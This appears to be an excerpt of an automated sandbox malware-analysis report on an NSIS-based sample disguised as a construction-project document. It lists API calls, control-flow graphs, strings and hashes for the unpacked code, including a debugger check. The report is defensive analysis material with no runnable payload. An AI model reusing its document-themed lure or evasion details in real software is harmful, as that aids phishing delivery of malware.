                                                                                                                          • GetDlgItem.USER32(?,000003F9), ref: 00404BC8
                                                                                                                          • GetDlgItem.USER32(?,00000408), ref: 00404BD3
                                                                                                                          • GlobalAlloc.KERNEL32(?,?), ref: 00404C1D
                                                                                                                          • LoadBitmapW.USER32(0000006E), ref: 00404C30
                                                                                                                          • SetWindowLongW.USER32(?,?,004051A8), ref: 00404C49
                                                                                                                          • ImageList_Create.COMCTL32(?,?,00000021,00000006,00000000), ref: 00404C5D
                                                                                                                          • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404C6F
                                                                                                                          • SendMessageW.USER32(?,00001109,00000002), ref: 00404C85
                                                                                                                          • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404C91
                                                                                                                          • SendMessageW.USER32(?,0000111B,?,00000000), ref: 00404CA3
                                                                                                                          • DeleteObject.GDI32(00000000), ref: 00404CA6
                                                                                                                          • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404CD1
                                                                                                                          • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404CDD
                                                                                                                          • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404D73
                                                                                                                          • SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404D9E
                                                                                                                          • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404DB2
                                                                                                                          • GetWindowLongW.USER32(?,?), ref: 00404DE1
                                                                                                                          • SetWindowLongW.USER32(?,?,00000000), ref: 00404DEF
                                                                                                                          • ShowWindow.USER32(?,00000005), ref: 00404E00
                                                                                                                          • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404EFD
                                                                                                                          • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404F62
                                                                                                                          • SendMessageW.USER32(?,?,00000000,00000000), ref: 00404F77
                                                                                                                          • SendMessageW.USER32(?,00000420,00000000,?), ref: 00404F9B
                                                                                                                          • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404FBB
                                                                                                                          • ImageList_Destroy.COMCTL32(?), ref: 00404FD0
                                                                                                                          • GlobalFree.KERNEL32(?), ref: 00404FE0
                                                                                                                          • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00405059
                                                                                                                          • SendMessageW.USER32(?,00001102,?,?), ref: 00405102
                                                                                                                          • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00405111
                                                                                                                          • InvalidateRect.USER32(?,00000000,00000001), ref: 00405131
                                                                                                                          • ShowWindow.USER32(?,00000000), ref: 0040517F
                                                                                                                          • GetDlgItem.USER32(?,000003FE), ref: 0040518A
                                                                                                                          • ShowWindow.USER32(00000000), ref: 00405191
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000004.00000002.2942513381.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000004.00000002.2942494567.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000004.00000002.2942546434.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000004.00000002.2942567088.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000004.00000002.2942603725.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_4_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                                          • String ID: $M$N
                                                                                                                          • API String ID: 1638840714-813528018
                                                                                                                          • Opcode ID: 5536270c612583b56431b6cecbe513891586c3f04ea08752845fd7aab356c235
                                                                                                                          • Instruction ID: 03f87516f98afcaf774383f7594fe685c09e1d2031758133a9bfc9c340c12758
                                                                                                                          • Opcode Fuzzy Hash: 5536270c612583b56431b6cecbe513891586c3f04ea08752845fd7aab356c235
                                                                                                                          • Instruction Fuzzy Hash: 2E026DB0A00209EFEB209F54DD85AAE7BB5FB44354F10857AF610BA2E1C7789D52CF58
                                                                                                                          Function 0040335A Relevance: 63.4, APIs: 27, Strings: 9, Instructions: 383stringfilecomCOMMON
                                                                                                                          Download Yara Rule

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 307 40335a-4033f2 #17 SetErrorMode OleInitialize call 4062f6 SHGetFileInfoW call 405f8c GetCommandLineW call 405f8c GetModuleHandleW 314 4033f4-4033f6 307->314 315 4033fb-40340f call 405a04 CharNextW 307->315 314->315 318 40350a-403510 315->318 319 403414-40341a 318->319 320 403516 318->320 321 403423-40342a 319->321 322 40341c-403421 319->322 323 40352a-403544 GetTempPathW call 403326 320->323 324 403432-403436 321->324 325 40342c-403431 321->325 322->321 322->322 333 403546-403564 GetWindowsDirectoryW lstrcatW call 403326 323->333 334 40359c-4035b6 DeleteFileW call 402dbc 323->334 327 4034f7-403506 call 405a04 324->327 328 40343c-403442 324->328 325->324 327->318 342 403508-403509 327->342 331 403444-40344b 328->331 332 40345c-403495 328->332 337 403452 331->337 338 40344d-403450 331->338 339 4034b2-4034ec 332->339 340 403497-40349c 332->340 333->334 353 403566-403596 GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 403326 333->353 349 403667-403676 call 40382d OleUninitialize 334->349 350 4035bc-4035c2 334->350 337->332 338->332 338->337 346 4034f4-4034f6 339->346 347 4034ee-4034f2 339->347 340->339 344 40349e-4034a6 340->344 342->318 351 4034a8-4034ab 344->351 352 4034ad 344->352 346->327 347->346 348 403518-403525 call 405f8c 347->348 348->323 365 403772-403778 349->365 366 40367c-40368c call 405768 ExitProcess 349->366 355 403657-403663 call 40391f 350->355 356 4035c8-4035d3 call 405a04 350->356 351->339 351->352 352->339 353->334 353->349 355->349 369 403621-40362b 356->369 370 4035d5-40360a 356->370 367 403815-40381d 365->367 368 40377e-40379b call 4062f6 * 3 365->368 372 403823-403827 ExitProcess 367->372 373 40381f 367->373 401 4037e5-4037f3 call 4062f6 368->401 402 40379d-40379f 368->402 376 403692-4036ac lstrcatW lstrcmpiW 369->376 377 40362d-40363b call 405adf 369->377 375 40360c-403610 370->375 373->372 382 403612-403617 375->382 383 403619-40361d 375->383 376->349 380 4036ae-4036c4 CreateDirectoryW SetCurrentDirectoryW 376->380 377->349 389 40363d-403653 call 405f8c * 2 377->389 385 4036d1-4036fa call 405f8c 380->385 386 4036c6-4036cc call 405f8c 380->386 382->383 388 40361f 382->388 383->375 383->388 397 4036ff-40371b call 405fae DeleteFileW 385->397 386->385 388->369 389->355 408 40375c-403764 397->408 409 40371d-40372d CopyFileW 397->409 413 403801-40380c ExitWindowsEx 401->413 414 4037f5-4037ff 401->414 402->401 403 4037a1-4037a3 402->403 403->401 407 4037a5-4037b7 GetCurrentProcess 403->407 407->401 420 4037b9-4037db 407->420 408->397 411 403766-40376d call 405e26 408->411 409->408 412 40372f-40374f call 405e26 call 405fae call 405703 409->412 411->349 412->408 429 403751-403758 CloseHandle 412->429 413->367 418 40380e-403810 call 40140b 413->418 414->413 414->418 418->367 420->401 429->408
                                                                                                                          APIs
                                                                                                                          • #17.COMCTL32 ref: 00403379
                                                                                                                          • SetErrorMode.KERNEL32(00008001), ref: 00403384
                                                                                                                          • OleInitialize.OLE32(00000000), ref: 0040338B
                                                                                                                            • Part of subcall function 004062F6: GetModuleHandleA.KERNEL32(?,?,?,0040339D,00000009), ref: 00406308
                                                                                                                            • Part of subcall function 004062F6: LoadLibraryA.KERNEL32(?,?,?,0040339D,00000009), ref: 00406313
                                                                                                                            • Part of subcall function 004062F6: GetProcAddress.KERNEL32(00000000,?), ref: 00406324
                                                                                                                          • SHGetFileInfoW.SHELL32(004206A8,00000000,?,000002B4,00000000), ref: 004033B3
                                                                                                                            • Part of subcall function 00405F8C: lstrcpynW.KERNEL32(?,?,00000400,004033C8,00428200,NSIS Error), ref: 00405F99
                                                                                                                          • GetCommandLineW.KERNEL32(00428200,NSIS Error), ref: 004033C8
                                                                                                                          • GetModuleHandleW.KERNEL32(00000000,00434000,00000000), ref: 004033DB
                                                                                                                          • CharNextW.USER32(00000000,00434000,?), ref: 00403403
                                                                                                                          • GetTempPathW.KERNEL32(00000400,00436800,00000000,?), ref: 0040353B
                                                                                                                          • GetWindowsDirectoryW.KERNEL32(00436800,000003FB), ref: 0040354C
                                                                                                                          • lstrcatW.KERNEL32(00436800,\Temp), ref: 00403558
                                                                                                                          • GetTempPathW.KERNEL32(000003FC,00436800,00436800,\Temp), ref: 0040356C
                                                                                                                          • lstrcatW.KERNEL32(00436800,Low), ref: 00403574
                                                                                                                          • SetEnvironmentVariableW.KERNEL32(TEMP,00436800,00436800,Low), ref: 00403585
                                                                                                                          • SetEnvironmentVariableW.KERNEL32(TMP,00436800), ref: 0040358D
                                                                                                                          • DeleteFileW.KERNEL32(00436000), ref: 004035A1
                                                                                                                          • OleUninitialize.OLE32(?), ref: 0040366C
                                                                                                                          • ExitProcess.KERNEL32 ref: 0040368C
                                                                                                                          • lstrcatW.KERNEL32(00436800,~nsu.tmp,00434000,00000000,?), ref: 00403698
                                                                                                                          • lstrcmpiW.KERNEL32(00436800,00435800,00436800,~nsu.tmp,00434000,00000000,?), ref: 004036A4
                                                                                                                          • CreateDirectoryW.KERNEL32(00436800,00000000), ref: 004036B0
                                                                                                                          • SetCurrentDirectoryW.KERNEL32(00436800), ref: 004036B7
                                                                                                                          • DeleteFileW.KERNEL32(0041FEA8,0041FEA8,?,0042A000,?), ref: 00403711
                                                                                                                          • CopyFileW.KERNEL32(00437800,0041FEA8,00000001), ref: 00403725
                                                                                                                          • CloseHandle.KERNEL32(00000000,0041FEA8,0041FEA8,?,0041FEA8,00000000), ref: 00403752
                                                                                                                          • GetCurrentProcess.KERNEL32(?,00000006,00000006,00000005,?), ref: 004037AC
                                                                                                                          • ExitWindowsEx.USER32(00000002,80040002), ref: 00403804
                                                                                                                          • ExitProcess.KERNEL32 ref: 00403827
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000004.00000002.2942513381.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000004.00000002.2942494567.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000004.00000002.2942546434.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000004.00000002.2942567088.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000004.00000002.2942603725.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_4_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: File$DirectoryExitHandleProcesslstrcat$CurrentDeleteEnvironmentModulePathTempVariableWindows$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextProcUninitializelstrcmpilstrcpyn
                                                                                                                          • String ID: Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$\Temp$~nsu.tmp
                                                                                                                          • API String ID: 4107622049-1875889550
                                                                                                                          • Opcode ID: 0611e268b4f88a4563411a583b9d41e63375025e242c0254b8011002441ca5a0
                                                                                                                          • Instruction ID: 3f9bff4532b5a1f920197c5518436c484d8c06ab90e6dd2e991860da6f926746
                                                                                                                          • Opcode Fuzzy Hash: 0611e268b4f88a4563411a583b9d41e63375025e242c0254b8011002441ca5a0
                                                                                                                          • Instruction Fuzzy Hash: 1FC11770604210AAD720BF659D45A2B3EACEB45749F10483FF940B62D2D77D9D41CB7E
                                                                                                                          Function 00405814 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 148filestringCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • DeleteFileW.KERNEL32(?,?,00436800,74DF2EE0,00434000), ref: 0040583D
                                                                                                                          • lstrcatW.KERNEL32(004246F0,\*.*,004246F0,?,?,00436800,74DF2EE0,00434000), ref: 00405885
                                                                                                                          • lstrcatW.KERNEL32(?,00409014,?,004246F0,?,?,00436800,74DF2EE0,00434000), ref: 004058A8
                                                                                                                          • lstrlenW.KERNEL32(?,?,00409014,?,004246F0,?,?,00436800,74DF2EE0,00434000), ref: 004058AE
                                                                                                                          • FindFirstFileW.KERNEL32(004246F0,?,?,?,00409014,?,004246F0,?,?,00436800,74DF2EE0,00434000), ref: 004058BE
                                                                                                                          • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 0040595E
                                                                                                                          • FindClose.KERNEL32(00000000), ref: 0040596D
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000004.00000002.2942513381.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000004.00000002.2942494567.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000004.00000002.2942546434.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000004.00000002.2942567088.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000004.00000002.2942603725.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_4_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                                          • String ID: \*.*
                                                                                                                          • API String ID: 2035342205-1173974218
                                                                                                                          • Opcode ID: 4ed0ee05c9631dde3e80ce67619df9396c3fab044b7677952d462ea79704d39b
                                                                                                                          • Instruction ID: 43b78ede77d9c0270a3625fa09dd856e9a99610c0d190015c3454e79d0f7c46c
                                                                                                                          • Opcode Fuzzy Hash: 4ed0ee05c9631dde3e80ce67619df9396c3fab044b7677952d462ea79704d39b
                                                                                                                          • Instruction Fuzzy Hash: A541C171900A15E6CB217B61CC49BAF7678EF81768F20817BF801B61D1D77C49829EAE
                                                                                                                          Function 004065E1 Relevance: 5.4, APIs: 4, Instructions: 382COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000004.00000002.2942513381.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000004.00000002.2942494567.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000004.00000002.2942546434.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000004.00000002.2942567088.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000004.00000002.2942603725.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_4_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 05c614c4f20a384ebef59dc8ddd16a5626e9342178c9d40e40815452f54a0124
                                                                                                                          • Instruction ID: de185f48d860fff5590de95dd02018db6e9577308a0edf9c34ceb3d093010d57
                                                                                                                          • Opcode Fuzzy Hash: 05c614c4f20a384ebef59dc8ddd16a5626e9342178c9d40e40815452f54a0124
                                                                                                                          • Instruction Fuzzy Hash: A7F18870D00269CBCF28CFA8C8946ADBBB1FF44305F25856ED856BB281D7385A96CF44
                                                                                                                          Function 004062CF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14fileCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • FindFirstFileW.KERNEL32(00436800,00425738,00424EF0,00405B28,00424EF0,00424EF0,00000000,00424EF0,00424EF0,00436800,?,74DF2EE0,00405834,?,00436800,74DF2EE0), ref: 004062DA
                                                                                                                          • FindClose.KERNEL32(00000000), ref: 004062E6
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000004.00000002.2942513381.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000004.00000002.2942494567.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000004.00000002.2942546434.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000004.00000002.2942567088.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000004.00000002.2942603725.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_4_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Find$CloseFileFirst
                                                                                                                          • String ID: 8WB
                                                                                                                          • API String ID: 2295610775-3088156181
                                                                                                                          • Opcode ID: ea398e9f6ccb252cf4d9fa8037675df58843bd33ee06a9524947f1dc2dc69440
                                                                                                                          • Instruction ID: 1ee065d6e3812395a970a313fce2833205c85b6b9f4a8d8b1e1fbb38817291b4
                                                                                                                          • Opcode Fuzzy Hash: ea398e9f6ccb252cf4d9fa8037675df58843bd33ee06a9524947f1dc2dc69440
                                                                                                                          • Instruction Fuzzy Hash: BED0123198A030EBC20067786D0CC4B7A989B553317514ABAF426F63E0C7389C65969D
                                                                                                                          Function 332B60E2 Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 332B61DA
                                                                                                                          • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 332B61E4
                                                                                                                          • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 332B61F1
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000004.00000002.2967656105.00000000332B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 332B0000, based on PE: true
                                                                                                                          • Associated: 00000004.00000002.2967631198.00000000332B0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000004.00000002.2967656105.00000000332C6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_4_2_332b0000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3906539128-0
                                                                                                                          • Opcode ID: bc57e19fabfba8db9e424c30b65c8077644a9f90138480eaac3f7c3d5c286309
                                                                                                                          • Instruction ID: 45f197a59073b895ce478eb4de1cd639497da44b028638b8e625be3f95827160
                                                                                                                          • Opcode Fuzzy Hash: bc57e19fabfba8db9e424c30b65c8077644a9f90138480eaac3f7c3d5c286309
                                                                                                                          • Instruction Fuzzy Hash: 4F31B2759013199BCF21DF64D988BCDBBB8EF08350F5081EAE81CA6260E7749BC58F45
                                                                                                                          Function 332B4AB4 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • GetCurrentProcess.KERNEL32(?,?,332B4A8A,?,332C2238,?,332B4BBD,00000000,00000000,00000001,332B2082,332C2108,?,332B1F3A,?), ref: 332B4AD5
                                                                                                                          • TerminateProcess.KERNEL32(00000000,?,332B4A8A,?,332C2238,?,332B4BBD,00000000,00000000,00000001,332B2082,332C2108,?,332B1F3A,?), ref: 332B4ADC
                                                                                                                          • ExitProcess.KERNEL32 ref: 332B4AEE
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000004.00000002.2967656105.00000000332B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 332B0000, based on PE: true
                                                                                                                          • Associated: 00000004.00000002.2967631198.00000000332B0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000004.00000002.2967656105.00000000332C6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_4_2_332b0000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Process$CurrentExitTerminate
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1703294689-0
                                                                                                                          • Opcode ID: 90da3a0e5069cf3dba29ce628246af602155b6e2e5ecf343ec63bd1e4c0e26aa
                                                                                                                          • Instruction ID: 06adaca2983ba20e440897352049dc723e192ff0dad4413e797e900473d793b8
                                                                                                                          • Opcode Fuzzy Hash: 90da3a0e5069cf3dba29ce628246af602155b6e2e5ecf343ec63bd1e4c0e26aa
                                                                                                                          • Instruction Fuzzy Hash: 64E0923A400219AFCF016F65C959A893FB9EB44381B508814FA559A521EB75D9C3CB54
                                                                                                                          Function 332B724E Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000004.00000002.2967656105.00000000332B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 332B0000, based on PE: true
                                                                                                                          • Associated: 00000004.00000002.2967631198.00000000332B0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000004.00000002.2967656105.00000000332C6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_4_2_332b0000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: HeapProcess
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 54951025-0
                                                                                                                          • Opcode ID: e91cf8b4ce55f67b51d0036cb53c32e8db59f7bde8f0e024a01cc3f49e8c33ec
                                                                                                                          • Instruction ID: f4fa2328e4fe332fd05d6b90339a8e71f69e925a3957b3ae8c292ec17bb38048
                                                                                                                          • Opcode Fuzzy Hash: e91cf8b4ce55f67b51d0036cb53c32e8db59f7bde8f0e024a01cc3f49e8c33ec
                                                                                                                          • Instruction Fuzzy Hash: 21A011302002038F8300AE30C28E28C3EECAA003803008828AA08E0000FB2880028B00
                                                                                                                          Function 00405373 Relevance: 66.8, APIs: 36, Strings: 2, Instructions: 284windowclipboardmemoryCOMMON
                                                                                                                          Download Yara Rule

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 134 405373-40538e 135 405394-40545b GetDlgItem * 3 call 4041cf call 404ad1 GetClientRect GetSystemMetrics SendMessageW * 2 134->135 136 40551d-405524 134->136 156 405479-40547c 135->156 157 40545d-405477 SendMessageW * 2 135->157 138 405526-405548 GetDlgItem CreateThread CloseHandle 136->138 139 40554e-40555b 136->139 138->139 141 405579-405583 139->141 142 40555d-405563 139->142 146 405585-40558b 141->146 147 4055d9-4055dd 141->147 144 405565-405574 ShowWindow * 2 call 4041cf 142->144 145 40559e-4055a7 call 404201 142->145 144->141 160 4055ac-4055b0 145->160 151 4055b3-4055c3 ShowWindow 146->151 152 40558d-405599 call 404173 146->152 147->145 149 4055df-4055e5 147->149 149->145 158 4055e7-4055fa SendMessageW 149->158 154 4055d3-4055d4 call 404173 151->154 155 4055c5-4055ce call 405234 151->155 152->145 154->147 155->154 163 40548c-4054a3 call 40419a 156->163 164 40547e-40548a SendMessageW 156->164 157->156 165 405600-40562b CreatePopupMenu call 405fae AppendMenuW 158->165 166 4056fc-4056fe 158->166 173 4054a5-4054b9 ShowWindow 163->173 174 4054d9-4054fa GetDlgItem SendMessageW 163->174 164->163 171 405640-405655 TrackPopupMenu 165->171 172 40562d-40563d GetWindowRect 165->172 166->160 171->166 176 40565b-405672 171->176 172->171 177 4054c8 173->177 178 4054bb-4054c6 ShowWindow 173->178 174->166 175 405500-405518 SendMessageW * 2 174->175 175->166 179 405677-405692 SendMessageW 176->179 180 4054ce-4054d4 call 4041cf 177->180 178->180 179->179 182 405694-4056b7 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 179->182 180->174 183 4056b9-4056e0 SendMessageW 182->183 183->183 184 4056e2-4056f6 GlobalUnlock SetClipboardData CloseClipboard 183->184 184->166
                                                                                                                          APIs
                                                                                                                          • GetDlgItem.USER32(?,00000403), ref: 004053D1
                                                                                                                          • GetDlgItem.USER32(?,000003EE), ref: 004053E0
                                                                                                                          • GetClientRect.USER32(?,?), ref: 0040541D
                                                                                                                          • GetSystemMetrics.USER32(00000002), ref: 00405424
                                                                                                                          • SendMessageW.USER32(?,00001061,00000000,?), ref: 00405445
                                                                                                                          • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 00405456
                                                                                                                          • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 00405469
                                                                                                                          • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 00405477
                                                                                                                          • SendMessageW.USER32(?,00001024,00000000,?), ref: 0040548A
                                                                                                                          • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 004054AC
                                                                                                                          • ShowWindow.USER32(?,?), ref: 004054C0
                                                                                                                          • GetDlgItem.USER32(?,000003EC), ref: 004054E1
                                                                                                                          • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 004054F1
                                                                                                                          • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 0040550A
                                                                                                                          • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405516
                                                                                                                          • GetDlgItem.USER32(?,000003F8), ref: 004053EF
                                                                                                                            • Part of subcall function 004041CF: SendMessageW.USER32(?,?,00000001,00403FFB), ref: 004041DD
                                                                                                                          • GetDlgItem.USER32(?,000003EC), ref: 00405533
                                                                                                                          • CreateThread.KERNEL32(00000000,00000000,Function_00005307,00000000), ref: 00405541
                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 00405548
                                                                                                                          • ShowWindow.USER32(00000000), ref: 0040556C
                                                                                                                          • ShowWindow.USER32(?,?), ref: 00405571
                                                                                                                          • ShowWindow.USER32(?), ref: 004055BB
                                                                                                                          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004055EF
                                                                                                                          • CreatePopupMenu.USER32 ref: 00405600
                                                                                                                          • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00405614
                                                                                                                          • GetWindowRect.USER32(?,?), ref: 00405634
                                                                                                                          • TrackPopupMenu.USER32(00000000,?,?,?,00000000,?,00000000), ref: 0040564D
                                                                                                                          • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405685
                                                                                                                          • OpenClipboard.USER32(00000000), ref: 00405695
                                                                                                                          • EmptyClipboard.USER32 ref: 0040569B
                                                                                                                          • GlobalAlloc.KERNEL32(00000042,00000000), ref: 004056A7
                                                                                                                          • GlobalLock.KERNEL32(00000000), ref: 004056B1
                                                                                                                          • SendMessageW.USER32(?,00001073,00000000,?), ref: 004056C5
                                                                                                                          • GlobalUnlock.KERNEL32(00000000), ref: 004056E5
                                                                                                                          • SetClipboardData.USER32(0000000D,00000000), ref: 004056F0
                                                                                                                          • CloseClipboard.USER32 ref: 004056F6
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000004.00000002.2942513381.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000004.00000002.2942494567.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000004.00000002.2942546434.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000004.00000002.2942567088.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000004.00000002.2942603725.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_4_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                                                                          • String ID: {$&B
                                                                                                                          • API String ID: 590372296-2518801558
                                                                                                                          • Opcode ID: a39a70bf23027790c6ceed37ac1eea17eaf571d42ba170f52e1d303d879162e8
                                                                                                                          • Instruction ID: 4bfa3faa41321a0cadf5913ced3eb51c87a7cc043350d2f69421d7beec3be44d
